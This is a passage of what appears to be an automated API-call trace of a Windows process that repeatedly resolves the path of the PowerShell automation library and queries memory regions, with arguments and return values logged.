AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.560] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.561] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.562] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.562] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.563] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.564] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.564] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.564] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.565] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.565] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.565] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.565] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.566] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.566] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.567] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.568] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.568] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.568] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.569] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xd37c877e, Data2=0x9f0e, Data3=0x4ee3, Data4=([0]=0x85, [1]=0x81, [2]=0x55, [3]=0xac, [4]=0x18, [5]=0x48, [6]=0x1f, [7]=0x3e))) returned 0x0 [0135.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.573] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.573] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.573] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.575] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.575] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.575] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.575] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, 